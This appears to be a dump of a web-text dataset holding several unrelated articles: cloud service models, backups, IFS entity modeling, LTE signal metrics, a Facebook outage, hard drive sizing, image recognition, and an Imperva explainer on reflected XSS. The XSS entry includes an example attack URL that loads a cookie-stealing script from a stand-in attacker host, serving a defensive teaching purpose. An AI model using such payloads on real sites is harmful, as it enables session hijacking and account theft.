text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
Cloud solutions are for the most part no longer seen as an option, but a necessity. The versatility of cloud services has seen them impact everyone from small independent companies to global enterprises. But cloud services aren’t a one-size-fits-all solution, and with so many options and terminology relating to them, finding a suitable solution or service can be confusing.
We thought it would be helpful to decipher three of the most commonly used cloud service terms; Software as a Service (SaaS), Platform as a Service (PaaS) and Infrastructure as a Service (IaaS). All can be very beneficial to business but despite sounding very similar, their functions differ greatly, and their relevancy ultimately depends on the end users’ requirements. So, let’s break them down.
Definition: A method of software delivery in which software is accessed online via a subscription, rather than bought up-front and installed on individual devices.
Being the most commonly utilised of the three, you’ve likely heard of Software as a Service before and probably use SaaS delivered applications on a regular basis. Essentially, SaaS is remotely accessing cloud-based application services on demand, making them widespread throughout commercial markets using the cloud. As these applications are accessed through the internet, they often need no implementation by the end user. Well-known examples of SaaS applications are Uber, Netflix, Salesforce, Dropbox and Microsoft Office 365.
For businesses, Software as a Service applications provide a cost effective, flexible and simple solution in place of purchasing traditional software, which often came with a hefty up-front investment and installation period. Often multi-platform accessible (both web and mobile), SaaS can streamline business operations into one accessible resource, replacing many previously manual tasks, improving efficiencies and therefore saving time and money. With third parties hosting and maintaining the software, this also removes laborious installation and potentially costly technical support and maintenance costs. The SaaS model can also be scaled easily to meet the demands of the user and market.
Definition: A cloud-based environment for application and resource design and development.
Similar to how the SaaS model allows users to access ready-to-use software, PaaS allows users to access platforms for software creation. Like SaaS, generally a third party provider will deliver the tools needed for development over the internet. These components provide a framework which the user can then use to build and tailor specific applications. The PaaS provider is usually responsible for hosting servers, storage, network and all other infrastructure. This allows the end user the freedom to focus on the build. Common examples of PaaS providers include Oracle Cloud, WordPress.com and Google’s App Engine.
As PaaS allows users to consume resources they don’t have to invest in or maintain, it can be extremely cost-effective. The PaaS providers environment will also be fully tested and optimised and in most cases, superior to anything the end user could construct themselves. As this model is delivered over the internet, the end user is not bound by location or time restraints, providing a quick and convenient solution. However, the biggest benefit of the PaaS model is the ability to provide a platform to quickly develop and customise applications to the end users’ requirements.
Definition: A cloud computing service where virtualised computing resources are outsourced and accessed via the internet.
Made possible through virtualisation, the IaaS model allows users to purchase and expand hosting infrastructure without having to make the investment into the actual hardware. The infrastructure isn’t owned by the user, but this also means they aren’t responsible for the maintenance and upkeep of it. Some examples of infrastructure that might be accessed as a service are servers, storage arrays, operating systems or networks. Although the hardware itself is physical on the providers end, the services they provide at the user’s end are virtual. An example of IaaS is Microsoft’s Azure cloud platform and Secura’s VPC.
The fact the service is completely virtual has huge appeal for businesses looking for an easily implemented, managed solution. The lack of responsibility for the managed services can be beneficial as it not only removes the investment needed to purchase the equipment but also the cost of maintaining and housing it.
Although each model may seem similar on the surface, as explained they provide very different, specific functions, with the only exact match similarity being that they are all delivered as a service with no tangible elements and no (or minimal) upfront investment.
Hopefully this post has helped break them down and clear any confusion you may have. As always, if you have any questions please don’t hesitate to get in touch.
Image credit: bakhtairzein/Shutterstock.com
Matthew is Secura's content specialist, producing gripping, emotionally complex, edge of your seat, cloud hosting articles and videos.
Tweet me at: | <urn:uuid:1c3e0835-df26-4aa1-a48a-37e13654d776> | CC-MAIN-2022-40 | https://secura.cloud/industry-insight/saas-iaas-paas-cloud-services-explained | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00786.warc.gz | en | 0.936938 | 1,026 | 2.71875 | 3 |
In today’s modern business world, you’d be hard-pressed to find an organization that doesn’t utilize the cloud to at least some extent. Let’s take a dive into how businesses use the cloud to be more sustainable and efficient.
Understanding How Business Computing Has Changed
It wasn’t so long ago that users needed the physical copy of a movie to watch it, but with the advent of streaming at an affordable monthly rate, people are finding that they are spending less money and still getting all the access to movies that they love. The same can be said for television series, as you don’t have to wait for the airing time to watch a specific episode.
This cloud-based model has been adopted by many companies that provide software to organizations. Rather than purchasing licenses, businesses instead choose to pay a monthly fee for each user to access this service through the cloud. Of course, when it’s absolutely needed, the organization might still choose to purchase the software outright, but cloud computing is generally considered the standard.
Why Cloud Computing Is So Popular
Rather than selling consumers installation codes or discs, the cloud enables organizations like Adobe and Microsoft to deliver services to users based specifically on what they need. Here are just some of the many benefits:
- Reduced Piracy: The cloud is able to prevent software piracy simply by making it more accessible. The solutions are better protected by the developer, as the user needs an account to access it. Plus, if users have more access to these solutions, they will be less likely to seek alternative means of accessing it through piracy.
- Reduced Business Requirements: On-site infrastructure also plays a role in how often users can take advantage of software solutions. While businesses would need to implement full-blown workstations in the past, cloud solutions enable workers to access services on any device they own, whether it’s a slimmed down workstation or their laptop.
- Reduced User Restrictions: Users are less restricted by resources when they use the cloud for certain services. For example, the momentary “genius” moment where you’re not in front of a computer won’t help if you have no way to record it. The cloud gives employees the opportunity to take advantage of solutions on mobile devices, making them much more accessible when needed most.
- Reduced Financial Toll: A user might need a large down payment for purchasing a software license, as well as all the services fees required to maintain the infrastructure. Software as a service through the cloud makes it so that software is more accessible and affordable to businesses.
Does your business want to take advantage of software in the cloud? ActiveCo can help. To learn more, reach out to us at 604-931-3633. | <urn:uuid:67c34e5f-528e-49b5-b95f-ef3d25174e07> | CC-MAIN-2022-40 | https://www.activeco.com/taking-a-look-at-cloud-growth/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00786.warc.gz | en | 0.946535 | 573 | 2.609375 | 3 |
World Backup Day was born out of regret.
As the story goes, the idea germinated on Reddit, as many things do, when some poor soul lamented the loss of a hard drive, which, tragically, had not been backed up. If only they had been more prepared …
From that simple, yet visceral post emerged a global effort to prevent such regret. That is why we now set aside March 31, just before April Fools’ Day, to remind all who will listen to be prepared for data loss and theft. Don’t be fooled into not backing up your data!
As World Backup Day stretches into its second full decade in 2022, individuals and organizations alike would be wise to heed its call to action. In fact, World Backup Day is more important now than ever before.
Mo Data Mo Problems
The first World Backup Day was celebrated in 2011 — or 29 iPhone models, 20 Marvel movies, three U.S. Presidents, and one pandemic ago. Suffice it to say, our world looks a lot different, as does our data.
For starters, we have a lot more of it now. From 2011 to 2022, the total amount of data created worldwide increased by 92 zettabytes, according to Statista. (For reference, a zettabyte is a billion terabytes. Think about it this way: If every terabyte in a zettabyte were a kilometer, it would be equivalent to 1,300 round trips to the moon. Go ahead and multiply that by 92 and you’ll start getting a sense of the amount of data we’re talking about.)
As data increases, so does its value to us. Medical records, financial statements, confidential employee information, classified government documents, pictures of your pets, all of it living electronically somewhere. A pessimist might choose to frame this another way. The more data we have, the more data we have to lose. As the Notorious B.I.G. would say, “Mo Data Mo Problems.”
Today, the pain associated with losing data — because of human error, hardware failure, natural disaster, or theft — has become almost ubiquitous. Even my 85-year-old grandparents (generally) understand the importance of backing up their photos to the cloud. While losing family photographs can be frustrating, even saddening, the financial, legal, and reputational ramifications associated with data loss can be catastrophic for businesses, governments, and other large organizations.
And here’s the final rub: As the amount and value of data increases, so will attempts to steal and/or compromise it. Those who pay attention to recent headlines already know this to be true.
According to Cybersecurity Ventures, global cybercrime costs are expected to grow by 15 percent year over year. By 2025, the damages are predicted to reach $15 trillion annually, up from $3 trillion in 2015. That would represent the greatest transfer of economic wealth in human history — exponentially larger than costs associated with natural disasters and more profitable than the global sale of all major illegal drugs combined.
Yeah … yikes.
Back(up) to the Basics
The unfortunate truth of our time is it’s likely not a matter of if data loss will occur — but when. Data can be accidentally deleted or become corrupted. Viruses, physical damage, or formatting errors can render it unreadable by both humans and software. Cyber attacks are not only growing in frequency, but sophistication, with criminals finding new and creative ways to reach our data.
It increasingly looks like data loss — at least for a time — is inevitable.
In light of this reality, we’re reminded just how important the message of World Backup Day actually is. The need for secure, reliable backup has never been more paramount, especially for critical industries like healthcare, manufacturing, financial services, government, education, and transportation. There’s simply no room for “If Only” scenarios that end in data loss and regret.
Backups can truly make a difference when protecting your critical data. To get started, organizations should ensure that they’re abiding by the golden rule of data protection: the 3-2-1 rule of backup. This rule stipulates that you should keep three instances of your data (original and two backup copies) on two different media (i.e. cloud) with one copy off-site in case of a natural disaster or other data catastrophe.
As data loss events become more unpredictable, the need for an air-gapped/hardened backup target has also become a must-have. Many ransomware varieties or malicious processes will now attempt to delete or encrypt backup data. Ensuring your organization’s backups are protected from such threats is vital.
The good news is that with a little extra initiative, there are reasons to believe that our data can be protected and retrievable when needed. Luckily, today’s backup and recovery solutions are simple to manage, affordable, flexible, and non-intrusive.
This World Backup Day, make sure you have the right backup and recovery solutions in place. Protect your data wherever it lives with iland and 11:11 Systems. You won’t regret it.
For more information: iland Secure Cloud Backup. | <urn:uuid:77129376-bcc3-4347-96f9-00a28000f6c8> | CC-MAIN-2022-40 | https://iland.com/blog/world-backup-day-why-its-more-important-than-ever/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335034.61/warc/CC-MAIN-20220927131111-20220927161111-00786.warc.gz | en | 0.936978 | 1,086 | 2.515625 | 3 |
The Entity is used to model a business object in IFS Cloud. One business object is represented by one or more entities. Entities are used to encapsulate different properties and code that belongs to just one entity. Entities are represented by tables, views and packages in the code.
Note: In previous versions of IFS Applications a Logical Unit (LU) was used instead of an entity. The LU is still described in some IFS documentation. Please remember that a LU is exactly the same as an entity.
Entities can be layered, meaning that they can be extended.
When you create an entity you will need to consider what attributes should be included, what associations the entity has to other entities, and if the entity should be a state machine or not; one should also consider if the entity is a generalization or not and what code generation properties needs to be set in order to change the generated code. Please read more about these concepts in the following sections:
Simple entities are easy to model in Developer Studio, but to model more complex entities, with a lot of attributes and code generation properties is a bit harder. You need to think more about how to do the model and what it should represent. When you model an entity you also have a lot of choices to do; should it have associations; should it have a state machine; should it be a generalization entity; what code generation properties is needed to use in order to change the behavior etc.
You can choose between modeling the entity in text or in a diagram. You can also use overview diagrams to better visualize relations between entities.
Follow these steps to model an entity:
- Create the entity model.
- Add the attributes to the model.
- If the entity has associations to other entities, add them to the model.
- If the entity should have a state machine, add states and transitions to the model.
- If you need to change the behavior of the code generation, add code generation properties.
The codegen properties can be added on the top level, on the attributes, on the search domains, on the associations and on the states of the model.
- If the entity is a generalization, add that in the model.
- Generate the code.
In most cases you need to run through the steps above several times before you feel that the entity represents what you aimed for.
After code generation, you will get the following:
- One table to store the data.
- One database view called the base view, used to present data to the client.
- One database package, used to create entity specific business rules.
- The storage file is used for overtaking objects, adding sequences, creation of extra indexes and creation of additional tables.
- The views file is used for overtaking, overriding views and for creation of additional views.
- The plsql file is used for overtaking, overriding methods and creation of own written methods.
This is an example of an entity with a reference and code generation properties on different attributes. | <urn:uuid:9bf729f1-355d-4d22-a80e-b7c94c1d2f7a> | CC-MAIN-2022-40 | https://docs.ifs.com/techdocs/21r2/050_development/027_base_server_dev/010_model/020_entities/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00786.warc.gz | en | 0.901936 | 646 | 3.015625 | 3 |
What is a XSS attack
What is a reflected XSS attack
Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim’s browser.
The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts. The vulnerability is typically a result of incoming requests not being sufficiently sanitized, which allows for the manipulation of a web application’s functions and the activation of malicious scripts.
To distribute the malicious link, a perpetrator typically embeds it into an email or third party website (e.g., in a comment section or in social media). The link is embedded inside an anchor text that provokes the user to click on it, which initiates the XSS request to an exploited website, reflecting the attack back to the user.
Unlike a stored attack, where the perpetrator must locate a website that allows for permanent injection of malicious scripts, reflected attacks only require that the malicious script be embedded into a link. That being said, in order for the attack to be successful, the user needs to click on the infected link.
As such, there are a number of key differences between reflected and stored XSS attacks, including:
- Reflected attacks are more common.
- Reflected attacks do not have the same reach as stored XSS attacks.
- Reflected attacks can be avoided by vigilant users.
With a reflected XSS, the perpetrator plays a “numbers game” by sending the malicious link to as many users as possible, thereby improving his odds of successfully executing the attack.
Reflected XSS attack example
- The query produces an alert box saying: “XSS”.
This tells the perpetrator that the website is vulnerable. Next, he creates his own URL, which reads http://forum.com?q=news<\script%20src=”http://hackersite.com/authstealer.js” and embeds it as a link into a seemingly harmless email, which he sends to a group of forum users.
While the sending address and subject line may appear suspect to some, it does not mean that it won’t be clicked on.
In fact, even if only one in every 1,000 recipients of the email click on the link, that still amounts to several dozen infected forum users. They will be taken to the forum’s website, where the malicious script will be reflected back to their browser, enabling the perpetrator to steal their session cookies and hijack their forum accounts.
Reflected XSS attack prevention and mitigation
There are several effective methods for preventing and mitigating reflected XSS attacks.
First and foremost, from the user’s point-of-view, vigilance is the best way to avoid XSS scripting. Specifically, this means not clicking on suspicious links which may contain malicious code. Suspicious links include those found in:
- Emails from unknown senders
- A website’s comments section
- Social media feed of unknown users
Having said that, it is ultimately up to a website operator to prevent potential abuse to their users.
Additionally, web application firewalls (WAFs) also play an important role in mitigating reflected XSS attacks. With signature based security rules, supported by other heuristics, a WAF can compensate for the lack of input sanitization, and simply block abnormal requests. This includes, but is not limited to, requests that attempt to execute a reflected cross site scripting attack.
It should be noted that, unlike in a stored attack, where the perpetrator’s malicious requests to a website are blocked, in a reflected XSS attack, it’s the user’s requests that are blocked. This is done to protect the user, as well as to prevent collateral damage to all other website visitors.
The Imperva cloud web application firewall also uses signature filtering to counter reflected XSS. Additionally, the WAF employs crowdsourcing technology, which automatically collects and aggregates attack data from across the entire Imperva network, for the benefit of all users.
The crowdsourcing component of Imperva cloud security service ensures a quick response to zero-day threats and protects the entire user community against new threats. It also enables the use of advanced security heuristics, including those that monitor IP reputation, to keep track of repeated offenders and botnet devices | <urn:uuid:cca9ad95-e896-44e0-ab9c-7423b9999006> | CC-MAIN-2022-40 | https://www.imperva.com/learn/application-security/reflected-xss-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00786.warc.gz | en | 0.916701 | 1,142 | 3.234375 | 3 |
If you’re carrying debts — from student loans, credit cards, a car note or a mortgage — you could probably tell me roughly how much you owe and at what interest rates you owe it. Thanks to the CARD Act, those of us who carry credit card debt now see how long it will take to pay it off on our monthly statements. It’s likely, however, that most folks don’t realize that by spending money on non-essentials, rather than paying off debt, you’re paying a tax of sorts. Here’s why.
While in debt, purchases you make actually cost more than what you pay the merchant, and not just when you buy it with a credit card. The reason for this is because every time we buy something (and particularly when we buy things we don’t need), we are forgoing the opportunity to pay off existing debt – given that, let’s just assume that everything we buy is essentially costing us more than we think we’re paying.
Let’s say you’re carrying a $1,000 credit card balance at a 20% APR, and your issuer sets your minimum monthly payment at 2% — which is $20. If you keep your monthly payment fixed at $20 a month until it’s paid off, it will take you just over nine years and you’ll have paid about $1,168 in interest. If you paid $21 a month instead, it would take you eight years and cost you about $1,005 in interest. (This is assuming you continue to pay down the debt, and do not add to it.) Just that extra $1 every month will save you a year of debt payments and $153.
Each dollar that you don’t pay over that fixed minimum payment ends up costing you so much more in the end.
It’s important to keep that in mind when buying things while carrying a balance. If an extra $1 a month can save $153 in the scenario above, what would an extra $5 a month (aka your Starbucks trip this morning) save you? How about an extra $70 a month (aka those great jeans you wanted, but maybe didn’t need)? Buying items you don’t need while carrying debt costs you more in the long run.
It’s disconcerting to consider your spending as a series of purchases earning interest charges from the moment you make them, as you are in our debt tax scenario. For people already carrying credit card debt, avoiding interest charges is one reason they often switch to using debit cards. But if you’re not actively paring down your debts by making more than the minimum payments – even on low-interest rate debts like student loans, which some borrowers extend out to 30 years – you’re increasing the time you carry those balances and, because of compound interest, the balances themselves.
So what should you do?
1. Start Paying Off Debts Completely
Whether it’s paying off those debts with the highest interest rates – or just the smallest debts to give you the motivation to carry on – start paying down your balances. The longer you carry them, the more you owe.
2. Don’t Let Your Credit Card Charges Become Invisible Spending
Whether you switch to a debit card, begin using cash or simply sign up for text alerts to notify you of changes to your balances, make sure your spending is visible to you on a daily basis. If you wait until the statement arrives to know whether you can pay off the balance, it’s already too late.
3. Consolidate Credit Card Balances
If you qualify, consolidating your credit card balances on a low-interest rate credit card can reduce the amount your debt costs you by lowering the interest charges that accrue on your overall balance. You may want to consider a personal loan to consolidate debt as well – these loans tend to carry lower interest rates than credit cards and have a fixed monthly payment and term.
4. Avoid Paying Consolidation or Consulting Fees
Many consumers who find themselves mired in debt accrue more of it by paying fees to unscrupulous credit consolidators. Much what they will do for a fee you can do yourself by just taking the time to make a plan, pick up the phone, be assertive and untangle your finances.
5. Understand the Credit Effects
It’s a common credit misconception that carrying debt is good for your credit scores. In fact, carrying credit card debt can raise an important credit scoring stat – your utilization ratio. This number is the percentage of debt you charge to your total credit limit. Take our $1,000 example from above. If you carry that balance on a credit card with a $2,000 limit, you have a utilization of 50%. To achieve the best credit score you can, it’s important to keep this ratio under 30%, and 10% is even better. If you want to see where your utilization currently stands, you can see how it’s affecting two of your credit scores for free using tools on Credit.com.
When it comes to debt, there really are no free lunches. Indeed, it is always harder to get out of than it is to get into. The best thing you can do is to change your own thinking when it comes to money. When you are in debt, even the price tag has a price tag. | <urn:uuid:f1a245fb-187a-4ce1-9974-dd59a0bdcd27> | CC-MAIN-2022-40 | https://adamlevin.com/2014/03/27/debt-tax-owing-money-costs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00786.warc.gz | en | 0.947503 | 1,129 | 2.53125 | 3 |
The National Institute of Standards and Technology (NIST) has issued a draft guideline for developing artificial intelligence (AI) technical standards, the first major, formal step in writing the standards that will guide the procurement and implementation of AI and machine learning technologies within the federal government. And because many private organizations base their decisions on NIST documents, those standards could have repercussions that reach far beyond government purchasing.
Within the draft guideline are sections that deal with a wide variety of topics around AI, including how AI applications are developed, how AI is explained to stakeholders and the public, and how AI applications are used. Security plays a role in several aspects of the proposal, from how to build "trustworthy" AI applications to ensuring that AI's use takes both proper security and proper concern for privacy into account.
The NIST Guideline has been developed as part of the response to the American AI Initiative, established by executive order in February. Within five key areas of emphasis set out in the order, one called for NIST "to lead the development of appropriate technical standards for reliable, robust, trustworthy, secure, portable, and interoperable AI systems." Formal comments on the draft are being accepted through July 19.
For more, read here. | <urn:uuid:fcc38cc7-26fc-411c-b945-2d5fded0ba1b> | CC-MAIN-2022-40 | https://www.darkreading.com/application-security/nist-sets-draft-guidelines-for-government-ai | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00786.warc.gz | en | 0.955373 | 250 | 2.609375 | 3 |
A solid-state drive (SSD) is one of the most popular, fastest, and energy-efficient solutions for…
Humanity has long been plagued with the question, does size matter? Some say bigger is always better. Others believe size should be influenced by how the product will be used. So, who’s right?
Unfortunately, there’s no universal answer. From supersized fast food to pickup trucks with six doors, marketers have trained consumers to focus mostly on size—even when it comes to hard drive sizes.
So what does this mean for your next tech purchase? What is a normal hard drive size and what should your laptop hard drive size be? There’s a wide hard disk storage capacity range and deciding what you need can be a challenge. But when you consider the right factors, you can easily determine what drive size you need for your devices.
The role of hard drive sizes
You probably know that a hard drive is where the device stores your precious photos, videos and document files. Since a hard drive is simply your computer’s memory, hard drive capacity has little to do with performance and everything to do with how much content your device can hold. And this holds true unless the disk is nearly full. Any operating systems (OS), including Windows, requires a specific amount of available hard drive space to run properly.
A PC that runs on Windows needs 10 to 15% of a hard drive’s storage to function. For the sake of simplicity, we’ll use the example of a 100GB drive. In this case, you would need to allow at least 10 to 15GB for the OS. If you don’t have enough free space for the OS to access, you’ll experience a significant decline in your computer’s performance.
When you’re choosing hard drive sizes, look for a drive with a capacity well beyond what you need to store your data. Think about how much data you currently have and how much you anticipate adding over the life of your computer. Then add at least another 15% to ensure you’ll have plenty of storage capacity for your OS.
The importance of speed
Hard disk size is important, especially if you have a lot of information to store or plan to create a great deal of data in the near future. But speed is another important consideration.
Speed in Hard Disk Drives (HDD)
HDDs are powered by motors. Regardless of HDD size, the faster the motor spins, the more quickly information is read and written to the disk.
We determine the speed of HDD motors in revolutions per minute (RPM), which is a measure of rotational power. Desktops usually top out at 15,000 RPM. In contrast, laptop HDDs are slower at around 7,200 to 5,400 RPM. As with all decisions on a new computer, the speed of the hard drive should ultimately depend on how you’ll be using it. Of course, no one ever regrets investing in speed! So you’ll probably want to buy the fastest motor available for your desktop or laptop’s hard drive—especially if your computer will be used for gaming or storing multimedia files.
Speed in Solid State Drives (SSD)
Most hard drives in today’s consumer electronics use solid state technology are SSDs. They have no moving parts, not even a motor. That means no RPMs. SSD speed is measured by how quickly the drive can read or write digital data, specifically in MBs per second (MB/s).
Just as RPMs are independent of drive size in an HDD, so too are MB/s and hard drive capacity in an SSD. You can purchase minimal space with maximum speed, large capacity with low performance or anything in between. Your choice will be all about how much space you need and how you plan to use the drive.
Computer hard disk size
We’ve already talked briefly about the storage capabilities of HDDs within desktops and laptops. But the device you plan to use with your hard drive is actually another important consideration. Before deciding on hard disk size—or any other aspect of your disk—think through how the device will be used.
Do you need a desktop just for casual use? Or are you a gamer that requires far more capability than creating documents and spreadsheets? Do you need a laptop just to work or study remotely? Maybe your business is of a sensitive nature that precludes uploading data to a cloud.
But for most purposes, what is a good hard disk size? It depends if you’re getting a laptop or desktop machine
Desktop hard drive size
Desktops usually have larger hard drives, because they can physically fit a larger disk. They’re also more likely to be shared with other people and so need enough storage capacity to fit data from several users at the same time. Standard hard drives for desktops run from 500GB (or smaller!) to as large as several a terabytes (TB) in size (or larger!). But given the accessibility of cloud storage, the everyday user doesn’t usually need a large capacity hard drive.
Laptop Hard Drive Size
Most laptops have less storage than desktops because they’re physically smaller. The space constraints limit the hard drive capacity. Those same space constraints increase the overall cost of the computer because smaller is much harder to engineer and manufacture.
Figuring out the right hard drive size can be a challenge, but take the time to consider how you want to use your device, you’ll know how much you’ll need.
If your last disk failed, you’re going to need a new hard drive! But you’ll still need your old data. Call DriveSavers to learn how we can help you recover lost data. | <urn:uuid:1d809d1b-6464-496b-8327-7460762361af> | CC-MAIN-2022-40 | https://drivesaversdatarecovery.com/is-bigger-better-how-to-choose-the-right-hard-drive-sizes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00786.warc.gz | en | 0.927187 | 1,200 | 2.953125 | 3 |
An On Field Measurement Example: In other words, of the 300 subcarriers, 100 transmit periodic reference signals.
An LTE downlink is divided into subcarriers. A 5 MHz bandwidth downlink, contains 300 subcarriers. Those subcarriers, one in three carry LTE reference signals.
The LTE downlink graph comes from a Sprint site in the Kansas City area in late April, well before Sprint stopped blocking devices from live LTE sites. So, the sector depicted here exhibits no data traffic; it is transmitting only the periodic reference signals on 100 subcarriers, which you can clearly count in the graph.
Now, RSSI is the more traditional metric that has long been used to display signal strength for GSM, CDMA1X, etc., and it integrates all of the RF power within the channel passband.
In other words, for LTE, RSSI measurement bandwidth is all active subcarriers. As before RSSI = wideband power = noise + serving cell power + interference power
If we take the above RF sweep of a Sprint 5 MHz bandwidth downlink, RSSI measures the RF power effectively of what is highlighted in yellow:
RSRP is an LTE specific metric that averages the RF power in all of the reference signals in the pass-band. Remember those aforementioned and depicted 100 sub-carriers that contain reference signals?
To calculate RSRP, the power in each one of those sub-carriers is averaged.
As such, RSRP measurement bandwidth is the equivalent of only a single subcarrier. And using the graph once more, RSRP measures the RF power effectively of what is highlighted in red:
Since the logarithmic ratio of 100 sub-carriers to one sub-carrier is 20 dB (e.g. 10 × log 100 = 20), RSSI tends to measure about 20 dB higher than does RSRP.
RSRP measures about 20 dB lower than what we are accustomed to observing for a given signal level
Thus, that superficially weak -102 dBm RSRP signal level that we saw previously would actually be roughly -82 dBm if it were converted to RSSI.
To conclude, here are a few takeaways about RSSI and RSRP as signal strength measurement techniques for LTE:
- RSSI varies with LTE downlink bandwidth. For example, even if all other factors were equal, VZW 10 MHz LTE bandwidth RSSI would measure 3 dB greater than would Sprint 5 MHz LTE bandwidth RSSI. But that does not actually translate to stronger signal to the end user
- RSSI varies with LTE subcarrier activity — the greater the data transfer activity, the higher the RSSI. But, again, that does not actually translate to stronger signal to the end user
- RSRP does a better job of measuring signal power from a specific sector while potentially excluding noise and interference from other sectors
- RSRP levels for usable signal typically range from about -75 dBm close in to an LTE cell site to -120 dBm at the edge of LTE coverage
* Sources: 3GPP, author’s graphs | <urn:uuid:e7dbd417-6428-4ba6-9359-a025fcf8779d> | CC-MAIN-2022-40 | https://arimas.com/2016/04/08/an-on-field-measurement-example/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00186.warc.gz | en | 0.921478 | 647 | 3.0625 | 3 |
Last week’s massive outage on the Facebook-Instagram-WhatsApp ecosystem left many of us puzzled and concerned: How did our entire social communication (and news source for many) become so dependent in a single, non-regulated conglomerate? How come this conglomerate can fail over a seemingly-trivial reason such as DNS? And what are the dangers of our over-reliance on such interconnected entities as our connection to the world?
What caused the Facebook outage?
“The Facebook case was actually more than just a DNS Failure: The root cause seems to be BGP (Border Gateway Protocol) failures underlying the DNS Protocol, which then caused the DNS to start failing,” says Francesco Altomare, GlobalDots’ chief EU-based expert for web performance solutions and business continuity strategies.
“But in essence, the DNS failed because something wasn’t maintained as it should have, to the point it required manual intervention and resulted in an hours-long denial of service. A global corporation which controls most of the world’s means of social communication has a responsibility to minimize that risk.
“DNS was the cause of most major global outages recently, including the latest Facebook and Slack ones. It happens because DNS is the most overlooked protocol in the web. And it can happen to any online business – not just the biggest global ones – and create monetary & reputation damages beyond repair.
“I keep seeing commentaries saying “it’s always DNS” as if nothing can be done about it, and this simply isn’t true. A modest investment in a resilient, performant, 100%-uptime, SLA-backed DNS Technology can save all this, and we’ve been doing this for decades.”
Asked about the probability of such future events in global interconnected services, Francesco explains:
“The reliance on interconnected systems does carry with it an inherent risk of system or even service failure. To counter this daunting risk, companies utilize tools such as SRE (System Reliability Engineering), as well as DR (Disaster Recovery) and BCP (Business Continuity Planning), which all deal with varying levels of redundancy built into each and every layer of your systems infrastructure. In fact, the so-called “Compound SLAs” (Service-level Agreement) on systems deals with more than one component, each of which carries a distinct Availability SLA (see informal subject reference), are used to calculate that. The same goes for the notion of “Error Budgets” (Google explanation here), where you – as an Organization – live and cope with a budget for your systems’ downtime and maintenance windows. If an entity is able to afford enough system downtime, a limited solution can always be found to assess and input the technology to minimize the risk, and if repeated, potentially eliminate the risk from the agenda topic.
“Yet despite these defensive, preventative, and protection tools as well as the mounting literature on the subject, it remains that there is no magic formula to determine a user’s SLAs without active consultancy with its key stakeholders. Moreover, even a 100% Availability SLA-backed system is subject to failures, and when there is more than one component that actively contributes to the availability percentage, calculating the risk of failure becomes even more complex and grueling a task. Simply stated, it is not a question of how likely the risk might be for systems to fail or how an over-reliance on such systems may lead to more problems. Rather, the question is how long will it take for these systems to fail without constant maintenance and updates integration. As well as, what can be done to delay the inevitable system failure and maximize utilization and output most efficiently with the greatest optimization. Beyond that, the question turns to the human aspect in updating the system coding and configuration versus machine learning AI coding of the future, and whether this will lower the lisk and increase the timeframe of efficient system operation.
“DNS is probably the most overlooked web protocol, which is why even the world’s giants aren’t immune, unless they implement a multi-DNS strategy. This could happen to any website, and multi-DNS solutions are highly affordable, so no one should really go without them nowadays.“
Steven Puddephatt, GlobalDots’ chief UK solution architect, adds:
“The probability of these systems failing is 100%. We know this because no service provider will offer more than ‘7 nines’ uptime in their SLA. Undoubtedly Facebook have redundancy built into their core platform, but in this case it was a configuration change that caused the outage. As long as humans are involved with updating code & configurations there’ll always be outages. I don’t believe an over reliance on them will increase outages, there were far more system outages (overall) when systems were less consolidated, you just didn’t hear about them as they were less public facing.”
Watch Steven’s whiteboard explainer below
GlobalDots is happy to be leading the Multi-DNS front, keeping business customers out of outages for nearly 20 years. | <urn:uuid:256f460b-840d-429c-9f27-dddc058c23d4> | CC-MAIN-2022-40 | https://www.globaldots.com/resources/blog/globaldots-featured-on-lifewire/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00186.warc.gz | en | 0.94214 | 1,084 | 2.5625 | 3 |
Exciting uses of image recognition that already changing our lives
Image recognition has been a topic on our blog a few times before. It’s a technology that has not stopped gaining popularity for some time now, and we wanted to look at what other interesting and even non-conventional ways uses of image recognition software make a difference in different industries today.
Image recognition applications in healthcare
Do you know the feeling of waking up in the middle of the night, opening your eyes, and seeing the same blanket of darkness as when your eyes were closed? For some people, that constitutes their whole lives.
Apart from the more apparent restrictions being blind or visually impaired brings, these groups of people are also cut off from one of the most essential tools of our decade: social media.
Some years ago, Facebook changed the way blind and visually impaired people use and interact with Facebook, all thanks to use of image recognition. It might sound trivial and straightforward at first, but for someone who lives in near or complete darkness, scrolling through Facebook to check up on friends’ activities can take hours instead of minutes.
Facebook combined its face recognition, image classification applications, and automatic alternative text technologies to generate not only an accurate description of the elements a photo contains, but also who exactly is in the photo, even if they’re not tagged.
They developed the feature for the visually impaired by an accessibility team that included Facebook’s first blind engineer, Matt King. Matt has been legally blind since his early 20s.
This feature is based on the same technology that suggests what friends you should tag in your photos. It is a machine learning system that analyzes the pixels of the face in the image, creating a so-called “template” to use for future reference in identifying people.
And here are more image recognition examples. Notably, the most known part to have benefitted from image recognition technology, is radiology. IBM estimated last year that at least 90% of all patient data comprises images. That has taken a big toll on the radiologists who need to evaluate an increasing amount of images every day.
